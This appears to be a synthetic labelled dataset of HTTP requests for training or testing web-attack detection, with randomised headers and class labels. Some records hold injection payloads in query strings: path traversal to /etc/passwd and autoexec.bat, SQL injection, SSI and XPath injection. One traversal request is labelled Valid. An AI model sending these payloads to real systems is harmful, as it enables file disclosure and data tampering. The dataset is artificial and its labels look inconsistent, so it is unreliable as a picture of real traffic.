GET /u0srkee/elhSeea6aaisfrro/anhwr7EDetiyr9tdcs/eAlooe/c65cLcTeH_x9/enaOtQumonn/F.ju4catWqClsLexecTq/srt8uh8tcwlskaS.gif?gtpTn9mh3s=e_gb0Yc068&hg=4417&rsk2II=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: www.naotmi.org
Connection: keep-alive
Accept: video/*, text/plain;q=0.6, audio/*
Accept-Charset: isiri-3342;q=0.7, iso-8859-7;q=0.5, windows-1252, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Wed, 24 Nov 04 11:19:19 UTC
ETag: W/"Bw-VTAHyn5siXVHH1Jkn"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Sat, 01 Mar 08 14:34:55 CET
If-Unmodified-Since: Mon, 05 Jul 04 19:09:17 UTC
If-Match: "7Z-W-1lXRMCeLvy"
If-None-Match: *
If-Range: Tue, 26 Feb 08 24:39:26 GMT
Max-Forwards: 8
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Ym1uYTpkaWVmc2Nv
Authorization: NTLM cmE0b1luZW1udHJiaWNkNW50ZWpvaW42dGVhbTJpYWhu
Range: 48895-751657,65-
Referer: /piDaurs.php
TE: trailers
Trailer: Accept-Encoding
User-Agent: a5ro/0.3.9.2.4
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/0.6 www.pv1r3.png
Transfer-Encoding: gzip
Upgrade: ye1nNS/5.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36293
Start - Id: 12406
class: Valid
GET /OUnCqj8NFDBSc/umQuU.K@/e5/oYc/erclh9pd5dRaioaailxt/tbeot/let0iaeottd7dm1d/lXqzMb.php?TterfgmaEytwoot=440285084&cM4ttdsg5oo3=Es HTTP/1.1
Host: www.zodoeoIias.st
Connection: nc3ec
Accept: application/rtf, video/*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: o-ir;q=0.5, zne-bs, g-tvhao;q=0.3
Cache-Control: no-store
Client-ip: 64.125.54.143
Cookie: mi=63197;7lq=2
Cookie2: $Version="506"
Date: Wed, 15 Aug 07 18:14:56 UTC
ETag: "LvcSnfdcM60Ea2ZdpkO5"
Expect: ntndd
From: yEbsiob@rc7goqdh.be
If-Modified-Since: Tue, 17 Jan 06 04:48:00 CET
If-Unmodified-Since: Sat, 21 Feb 09 17:11:42 GMT
If-Match: "S3n1vXjWIIDrNW9w2r-a"
If-None-Match: "Y8432WqHO4-5I0Gu"
If-Range: Fri, 21 Jan 05 22:42:36 UTC
Max-Forwards: 571
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: feoulm Ptecse1=aOIsge
Authorization: trdrbt Hsoieg=atcttn3
Range: -119886,3059-
Referer: http://www.O3eEia.org/zzdt/uv4e3gec/0sesfno/sJeiurt/iwhyan.jpeg
TE: trailers,deflate
Trailer: Host
User-Agent: orfeipyqktNehbn
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 886x769
Via: 9.5 234.147.5.102
Transfer-Encoding: identity
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 287 176.2.7.94 "enesescISnojte" 
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 41667021783349598958
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12406
Start - Id: 10671
class: Valid
GET /iB_aBWdjil8XHFX/teelnpiudce5t/B5BlcTk_Ol/ttATkS-nPIlr1vv.jsp?%u-i3xMmK=33&etsnkeumtultx=DysnoaNnfcecrl6omt HTTP/1.0
Host: www.qeMvieArU.biz
Connection: keep-alive
Accept: image/*;q=0.2, audio/x-wav;q=0.8, image/*;q=0.4
Accept-Charset: windows-1250;q=0.0, ks_c_5601-1987;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: tose9al=dwn
Client-ip: 245.69.51.123
Cookie: hiiros8hsImh1ol=aocT;ea2gjMdhpinr=0469499053;XhcPeAievlustzh=e5itnisrf;siid8rS=o1le;4onwp6o=r2SR;bayxdevuseoh=adminr>tsobjectm:oeatcr$Oopasswdautoexec
Cookie2: $Version="92"
Date: Wed, 02 Jul 08 08:11:20 CET
ETag: "4HW@456wgHvT5yjvX96"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Thu, 16 Dec 04 10:22:34 GMT
If-Unmodified-Since: Wed, 14 Jul 04 23:23:28 GMT
If-Match: *
If-None-Match: "BwfILPO5bSU.bU80cK"
If-Range: Wed, 15 Aug 07 02:58:02 CET
Max-Forwards: 551
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: Basic b24yaG90czphcnlqNGdObg==
Range: 9268-2780
Referer: /cewTucat.mp3
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.0 (Machintosh; U; PPC 0.4; Il-ss; rv:5.6.2) Gecko/19089950
UA-CPU: 68000
UA-Disp: 2636,1101,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6678x842
Via: 4.6 www.nqmm.png, ca9ys/8.6 www.xwee6rsm.js, 8.1 www.dsisy.htm
Transfer-Encoding: actpyR
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 628 www.adro.shtml:8 "wytptersn" 
X-Forwarded-For: 168.27.206.6
X-Serial-Number: 45651300212096623
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10671
Start - Id: 5129
class: Valid
PUT /aDRLJKoBSR1sW9/htg/wnZniev5s/aimir6ubi7ryaeaJ/MlinkWXfqbdbMEcatia/iluechtf5hs0rcstsxe/e3WrhXmbKLO/tVHqYeBIGQ.mdb? HTTP/1.1
Content-Length: 128
Content-Language: ypu7
Content-Encoding: gzip
Content-Location: /weueaid7/tamere7/atsty/atts.wmn
Content-MD5: ZHNycmpnaXl0VjhEYWllbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Jul 04 19:11:35 CET
Last-Modified: Fri, 26 May 06 04:01:21 CET
Host: 219.83.217.164
Connection: close
Accept: */*
Accept-Charset: shift_jis
Accept-Encoding: gzip;q=0.5, deflate, gzip;q=0.7, compress;q=0.3, compress;q=0.8
Accept-Language: eeeode-S;q=0.9, hcq-isanos;q=0.1, otreYsa3-2nkAC, aJiY-tetd;q=0.4, n8nnee-aewdvti;q=0.2
Cache-Control: only-if-cached
Client-ip: 204.245.62.183
Cookie: matpnimnnPmeto=817894;-rqXDl=3S
Cookie2: $Version="190"
Date: Sun, 02 Sep 07 08:46:07 UTC
ETag: W/"3f0fN7qJOj3VYsrz2"
Expect: 100-continue
From: uieNui@f0tYn0rTH.biz
If-Modified-Since: Fri, 26 Sep 08 02:16:26 GMT
If-Unmodified-Since: Mon, 29 May 06 12:33:39 CET
If-Match: *
If-None-Match: "TsSMSmjAm3J6Dm4pBj0t"
If-Range: Tue, 02 Sep 08 07:05:41 UTC
Max-Forwards: 3
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: ousnt hedy=iarUf
Range: 5-8296,54-,-908276
Referer: http://oeaoa.st/His2c/if3m/9HiEntl.mp3
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: e3hfwUbucB http://www.iiemia.cz
UA-CPU: MIPS
UA-Disp: 393,0855,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 379x6273
Via: HTTP/1.1 www.oVan.css, 1.0 www.Nbbt9y.htm, 2.4 www.dklmelsd.css
Transfer-Encoding: compress
Upgrade: htyer/9.6, eieony/5.7, tsi/1.0, iueef/9.6, tNbj/5.6
Warning: 224 227.126.233.183 "ehAds4enRxnay" 
X-Forwarded-For: 75.44.5.216
X-Serial-Number: 64870443961077
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gtp5x_zg=qeao'k0Opt;Xl&cMAy=biiag&e5le3u=8475&VRac0=04536&n0ee=entpositioni&n7d8hg=nJ8tZLu&ttog4yeToEwAms=ommcEkFT1X&ro=raEg

End - Id: 5129
Start - Id: 795
class: Valid
GET /eEp3orcKe0yine/Ke3lsFc/rciKOZ6wp0P/rneIt/fVnph-n7BobjectERcc6Kj/0blo2sveip6ak/ToAa/dq/er7GYga9nenn8X3/ihadswchgaiavtehia/tdseAo2eEstnieci5e/lqhEEL_R.bin? HTTP/1.1
Host: www.4ac4eddd9N.it:80
Connection: PIzen
Accept: audio/*;q=0.2, video/quicktime, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: 7w-0;q=0.1
Cache-Control: min-fresh=788
Client-ip: 255.154.164.96
Cookie: anoo1dpmuem=tyip5Z;Rrntj3sgt52Csn=8oOhte;osaagDeule=6
Cookie2: $Version="824"
Date: Thu, 21 Jan 10 18:20:42 UTC
ETag: W/"vmSA-6D5iyFnqPDf"
Expect: liri
From: nfa6t@yuhu.net
If-Modified-Since: Mon, 20 Jul 09 20:20:11 CET
If-Unmodified-Since: Sat, 20 Oct 07 21:54:31 UTC
If-Match: "q7UKe2-VHdzIEtCg4neC"
If-None-Match: "GQ66nMKvkK.s.fiBs"
If-Range: *
Max-Forwards: 6820
MIME-Version: 2.3
Pragma: Li='inr'
Proxy-Authorization: Basic Y3VlZGFlOm5aaXlG
Authorization: Basic aGxhODplMG5pMmZ1
Range: 38651-,726-
Referer: http://www.atat.uk/miro.mp3
TE: chunked;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 1.8; ae-tB; rv:3.2.6) Gecko/01912088
UA-CPU: MIPS
UA-Disp: 2800,8749,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 305x8403
Via: 9.5 www.uarkis.html, 9.4 91.161.52.190, 5.1 220.159.66.27
Transfer-Encoding: rqtiny; asHgn=sldod64
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 902 87.88.171.144 "hqqbnejgret8be" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 40823
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 795
Start - Id: 14929
class: Valid
GET /ieeeiJio/JMN9x@/e2nrtshtsTonu/enGZbycJpkdweCYGPHV/nd/n3lctirAscb9saothzo/mWwF2cshGMIhm/1ologO-K4mcF.png?smedaAns=%28aFNpr%5Cmaarr%3D+ltS&atnjOdetYtt5=e1iim%5Det+gAtPo&tstdnheuOUes=s HTTP/1.1
Host: www.tCeen10h.st
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1251
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-age=03943
Client-ip: 210.67.84.109
Cookie: Raw69aimIfesEh=321;qQFsUMsxY5.=lTi;eprIleAH=rdoa1kotvec9ay;8ck3elTEt3ryA=tb@
Cookie2: $Version="542"
Date: Sun, 25 Feb 07 11:39:39 CET
ETag: W/"wX6oZQS@iE7-hH2T"
Expect: 100-continue
From: oate@atmthod.ch
If-Modified-Since: Sat, 10 Apr 10 12:52:59 CET
If-Unmodified-Since: Mon, 05 May 08 20:37:44 UTC
If-Match: *
If-None-Match: *
If-Range: "GV2k3T.PGCOh9kqiIpC"
Max-Forwards: 0283
MIME-Version: 8.7
Pragma: ig='uo'
Proxy-Authorization: Basic c3RlYmlPOm5lYWVlamVz
Authorization: NTLM YXJkSTlhNlNoRG5ib3NlbWNvcXJkbm5zZjR0YXJtclRld25paXR1
Range: 19024-74,-1374,-1
Referer: http://tyt17n.gov/cetom/ah97o4H/osoisaa/MeboUca.bin
TE: chunked
Trailer: From
User-Agent: hcptmahiw
UA-CPU: PowerPC
UA-Disp: 509,721,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: 7.1 161.23.27.194, et2/2.7 27.146.134.159, 0.5 234.237.177.151
Transfer-Encoding: compress
Upgrade: lalo/8.4, 8ggsn/9.9, nnnni/6.5, fayg/4.2, opiva/3.7
Warning: 194 www.rm0lai.jpeg "gocxkLhNTt9pfsEbecg" 
X-Forwarded-For: 124.227.211.95
X-Serial-Number: 51313390873628125654
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 14929
Start - Id: 4184
class: Valid
PUT /nlegdn.shtml? HTTP/1.0
Content-Length: 254
Content-Language: 9natnun,plentea4
Content-Encoding: identity
Content-Location: http://oos3o4m.it/uazrg.mp3
Content-MD5: b2FxYWtzcmFFbnpndXM2cg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Aug 07 21:36:31 UTC
Last-Modified: Mon, 20 Jun 05 03:09:14 GMT
Host: 12.91.190.50:5
Connection: jirHe
Accept: image/jpeg, video/*, video/mpeg;q=0.5
Accept-Charset: x-mac-icelandic, x-mac-hebrew;q=0.1, hz-gb-2312;q=0.9, x-mac-korean
Accept-Encoding: *
Accept-Language: fr0xt-thapFA, atzytt-noomc;q=0.7
Cache-Control: no-transform
Client-ip: 191.170.157.102
Cookie: Ecaoomcuo6nI=ej6ahDRmabv
Cookie2: $Version="908"
Date: Fri, 29 Oct 04 01:48:34 GMT
ETag: "pJmbnW9Nar64.yXK2Wl"
Expect: 6xsMd
From: aamse8@eaazpr.org
If-Modified-Since: Sun, 11 Jan 04 18:44:13 CET
If-Unmodified-Since: Wed, 04 Nov 09 20:43:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM dG50MDJhc3RyZFloY25leXRlU2Fqc3RoZjZhckdLdGphaXd0NzRjZWlhcng=
Authorization: Digest uri=/efehhae/ttd7/1hngzU/aecdGstl.wmn
Range: 6-,-5947,21-
Referer: /llneo/oaP3nE.pl
TE: gzip,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/8.3 (compatible; lFmchEnE; WinNT; nWreket3e; bzknso; atho)
UA-CPU: MIPS
UA-Disp: 1201,427,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 123x6429
Via: HTTP/2.5 www.selh.tiff, 2.6 www.sd17uazt.shtml, 2.6 235.190.224.118
Transfer-Encoding: identity
Upgrade: tIxs/2.9, corczi/8.6
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eefheet=oin7klhSdm&SPxmlqvOuaccept=lPNEdcb.0&jat=295&Uulng=?&Dse8sebuuhss=9&Tqra=e&s&ZgscriptbGPbq=65006&e5wne=v e&n&geat=223933&e0ogdngfnse0=nOw1pNfQru&on3o=oskzj6O8&sNsoaatxatloy=w4RW44MXoVxA&jt=355&16orInednsi=grafeetm&eirsnotsdlo8Zef=esrwrolhtr

End - Id: 4184
Start - Id: 42102
class: SqlInjection
GET /oWe1YC/cbc3tZ/9gntJB-JfVNH.tiff?Tetcx2KO5QZ=OR+++1%3E974451463085&Opau=oHsedtrt HTTP/1.1
Host: 86.24.162.149
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: aeet='t3c'
Client-ip: 195.244.99.47
Cookie: mNVnW9vsock_stream=|s;said1r=T<;_EErHNhJg_@G=312;et2yyrsiiecda=techoe;SYnS3=7500408149;YlikeTq=wnhIF
Cookie2: $Version="787"
Date: Thu, 11 Aug 05 05:56:12 GMT
ETag: W/"D83eFbifPOT4iL7"
Expect: elzgh
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 23 Aug 07 12:00:53 CET
If-Unmodified-Since: Thu, 26 Aug 04 20:49:12 CET
If-Match: *
If-None-Match: "AlbU6bliUe-VUnB0EVE"
If-Range: *
Max-Forwards: 5279
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest realm
Range: -824,-58,-460
Referer: /at8bt5.avi
TE: trailers,gzip
Trailer: User-Agent
User-Agent: retcdferm9s
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 67.134.243.28
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42102
Start - Id: 30017
class: Valid
GET /Q7NmD/WeltoeatrUauee/g2ne-FK0zRBgv6gs9_MV/9dwie1hEy/n9now4acoezdgtte/1G0fIdivdrop00TRL0_/hbdi2sUd6ioipxsbc.php? HTTP/1.1
Host: www.Snoemexs8.it:55659
Connection: Ewte
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, gzip;q=0.3, compress, deflate;q=0.2
Accept-Language: eest-oeNg7, tb-ptru
Cache-Control: no-store
Client-ip: 144.86.229.239
Cookie: een=s6R;Oeadgi=4634646;etEnvcoa=echosa-nok;z1t=3;rrQt2=7437073;ldrDozi7Eatert=34
Cookie2: $Version="72"
Date: Sun, 20 Sep 09 06:46:12 UTC
ETag: W/"BvopIOj24Q2Ts1ddJqx"
Expect: eiokr
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Thu, 11 Mar 04 22:06:42 CET
If-Unmodified-Since: Thu, 10 May 07 03:19:26 GMT
If-Match: "T18l6Mfp0dlkdNHKeP"
If-None-Match: *
If-Range: *
Max-Forwards: 310
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: yitanN eiz5i=odeihx
Authorization: Digest qop=tHictz
Range: 873888-,-667435,809054-93
Referer: /shweedni/s2mwth2l/ettmc/iolmgo2P/emomnnsc.jsp
TE: deflate;q=0.0,chunked;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: navTfeo (sDcpqVi-; n4zLbc; iH4QA8; ePSg.CnJ)
UA-CPU: StrongARM
UA-Disp: 6424,6665,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5067x616
Via: FTP/6.0 170.75.196.60, 8.6 www.urneE.jpg
Transfer-Encoding: identity
Upgrade: xo1itu/7.4, olnwaa/6.2
Warning: 698 84.253.68.212:4 "7dsm1OorilrtcueenXu5" "Tue, 29 Jun 04 24:51:44 GMT"
X-Forwarded-For: 23.247.167.67
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30017
Start - Id: 32994
class: Valid
PUT /ok8gSpK/YtUFV78N/6wkreplace/eenhriems5yecontq/6Hna3lw512KN5EBoMsoq/m3OyO6gyYh8/LBNHbP5YLO@/pqioies8esgPL8oht/d7jT3_.js? HTTP/1.1
Content-Length: 219
Content-Language: da4t,4dh
Content-Encoding: gzip
Content-Location: /rsacqroa/atet/lrsamg/podoaiyi/poqbaax.msf
Content-MD5: YWxvYWVsZXBobmFidG9saw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jun 08 15:23:07 UTC
Last-Modified: Tue, 04 Jul 06 16:21:08 CET
Host: 69.177.137.254
Connection: close
Accept: video/quicktime, text/*;q=0.0, text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 130.138.205.185
Cookie: @fNS9xpsvkdH=7294
Cookie2: $Version="205"
Date: Sun, 21 Mar 10 19:38:21 GMT
ETag: "X81m7l4U_8LMLb2QDFz"
Expect: sefcasnt=neyqhal
From: nxhoo@luihsl.gov
If-Modified-Since: Mon, 09 May 05 01:58:21 UTC
If-Unmodified-Since: Fri, 02 Dec 05 10:58:05 GMT
If-Match: "i7LM1NzCoU7sB00g5CDL"
If-None-Match: "H27fPTPBjwDes882n6"
If-Range: *
Max-Forwards: 03
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: Digest response="76535388aEaeFd62AE674aA6ECBAf689"
Range: 030-05545,617-,-53
Referer: /efeeUi/ebaen.txt
TE: trailers,chunked;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: itackar6rhNifjiha7
UA-CPU: MIPS
UA-Disp: 0209,118,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 560x481
Via: HTTP/4.6 57.145.196.112, ooeoal/5.3 www.thiae.png, FTP/8.6 26.161.33.45
Transfer-Encoding: compress
Upgrade: qsecsE/6.3, qmbont/3.4, auygm/9.2
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 75673085046625
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

bstrangtmtsKvo=eeo6&id0tmha9bo6aocs=fe&uo2e=3eit&sThYLAYS8w=aaeteomnerlaei&ioie83s=Ilocationss2ated&kyhzDM3qld=riheaE&e2rr=oykiywafxl6e&7mn79ld5ta2a=tle&n1yjbxioed23ta=tmptgol&ahal4=hccett&shutdown4Ea9hservicesorb6=4385

End - Id: 32994
Start - Id: 39336
class: SSI
GET /XowgetlogjVkYj9rZ3fF.php3?p3onja7=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&cfea1del=arep&nS8reeat=bY%3DlanodeugSn%3Alttetcsf&uolv=an%3CwkEacnriscript&iiebhcaffEiaiW=o6om_lSM&IElQu3eennndie=1c&S3g3B=te HTTP/1.0
Host: 182.59.238.228:9
Connection: close
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: identity, identity, compress, identity, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 153.213.53.71
Cookie: LMJ0BN6htpassmV=h"@"n;uotthoe=gensnooSnxtermteE;r6miife=kpd;theaTizCkeyuL=a\metxtr2v;eUjennhm=6;pneentdi7lc=rm\u
Cookie2: $Version="998"
Date: Mon, 25 Feb 08 18:58:20 UTC
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Fri, 24 Dec 04 23:05:09 CET
If-Unmodified-Since: Wed, 02 Sep 09 11:15:43 UTC
If-Match: "oYZRaQMJ1XaJ0Pa"
If-None-Match: *
If-Range: Sat, 29 May 04 03:58:58 UTC
Max-Forwards: 4723
MIME-Version: 3.0
Pragma: 2f1s=oey6
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM b3RlZWw1dEVlZWVydVJyWWduQ2JhbjJ0Y3JubHJuZXNuZTIx
Range: 422767-,0924-,61697-47592
Referer: http://ihhi.st/tg0ikStt/pice/n9panr4/xeoobdhu/rual.asp
TE: deflate;q=0.1,gzip,chunked
Trailer: Connection
User-Agent: Mozilla/5.9 (compatible; Konqueror/6.2; SunOS sun4u; o4taylerv)
UA-CPU: Sparc
UA-Disp: 607,126,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: 1.9 116.134.112.243, 8.5 114.203.73.248:11, 9.2 www.ortnei.jpg
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39336
Start - Id: 49610
class: XPathInjection
GET /pi/0QP2G5VT6.samf/eaYdB2hGBQVy/QFWTnullsock_streamW9E/r3qlink_bktWS3Os/ctOptzcitz8lro8bid/ylhp/lena2en2jeoayw5erek/sthIltA42y0SZe.jpg?Hsur0suh=ec&mhe=tfrceO&jpetmsault=hH4Lja&thnbsbhsr1ey8=1&lxFJiframeVtL@=ilBB40L0U&prnditcad=yopenadmini&idtnoaoEsunai=synse9+oi%406%3Fn%7E0%2B%26&soontaowmt6q=4+or+r%2FNe4tnd%2Fuoqnoi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D08%5D++++or+164%3D&iieao9meremk=ge%3B+&elachittooV=2230&tsht3exetfoo9=63727091&lycrbmniS=+ti5s HTTP/1.1
Host: 116.83.203.229
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-chinesetrad;q=0.3, iso-8859-8;q=0.5, x-mac-ce, euc-tw;q=0.2, x-mac-korean
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 124.225.114.247
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="4"
Date: Mon, 11 Jul 05 11:19:43 UTC
ETag: "dDzynAdXBl83z7Mz"
Expect: 100-continue
From: b3Tsmet@oiiienq.de
If-Modified-Since: Fri, 18 Mar 05 11:06:54 UTC
If-Unmodified-Since: Tue, 22 Sep 09 06:11:22 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 969
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic MXlsUnRsbzpqZWFvb1kz
Authorization: Digest uri=/eleetoG/wpshkcg/s2isWw/uAei.bin
Range: 7852-
Referer: /h1rs/cbome.asp
TE: chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 8.4; hh-sn; rv:7.0.4) Gecko/41078129
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: HTTP/3.4 www.hyti.js
Transfer-Encoding: tbsn
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49610
Start - Id: 45661
class: PathTransversal
GET /LupdateGCJAQJ@.htpassd/mdcLfy@_e.libunph-/owlAKqW1U6K2F_hl-8.m/t-GA1PW92fqExZ/tenirsehEiaptcp/EPWw/eRyMiAME0M5oE/uls60VWEKX_3O.jsp?ha6eomebHdgoana=0BYpnd&gaboboejoctnp4=s4tcTlTi&hsFat=22232&5eoatt11yd=aTtonsett&BlibAU3=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&ohtgtneAiu9njda=+&kenivRdaoso=ebr7peeUr6&siT=9785 HTTP/1.0
Host: 93.231.43.179:703
Connection: close
Accept: */*
Accept-Charset: utf-7, koi8-r, windows-1255;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 189.129.104.202
Cookie: soeatiyen3tf4m=);dsre1thtsoeSe=60792879;esasesdisiv=64672;ernueecodz0d=senn
Cookie2: $Version="46"
Date: Wed, 05 Jul 06 24:53:36 CET
ETag: W/"7x6zWK4vVBctAGUO"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Thu, 27 Jul 06 19:38:34 CET
If-Unmodified-Since: Fri, 24 Dec 04 16:52:50 GMT
If-Match: "w6At@Pqt6aQd3CsN6"
If-None-Match: *
If-Range: "dCi832-IZbJ8.O.ok6l"
Max-Forwards: 1150
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: Digest qop=teco
Range: 92916-
Referer: /ivhc/tEnlnd.jsp
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: ulsoqhs75ds5th
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: HTTP/0.2 www.ctwsqwsd.html, 0.0 www.snibRf.png:0
Transfer-Encoding: compress
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45661
Start - Id: 30093
class: Valid
GET /ko1b4ajgIvfi9reilorr/u7SAcEUS/Yhontekit2fdohooi3.shtml?gaj1nn=atboot.ini HTTP/1.0
Host: www.HiIe.cz
Connection: dhrnecaD
Accept: video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: O-addyujo, ezHteHU-7d
Cache-Control: min-fresh=83188
Client-ip: 117.251.79.81
Cookie: hsrdyCfle5atag=98;e1vradsR2rifI=581;se=2945853334;nN=r6w2tcres5rlwadtI;7SrUhZgroup byV=eitdtrst
Cookie2: $Version="5"
Date: Thu, 08 Feb 07 08:02:44 GMT
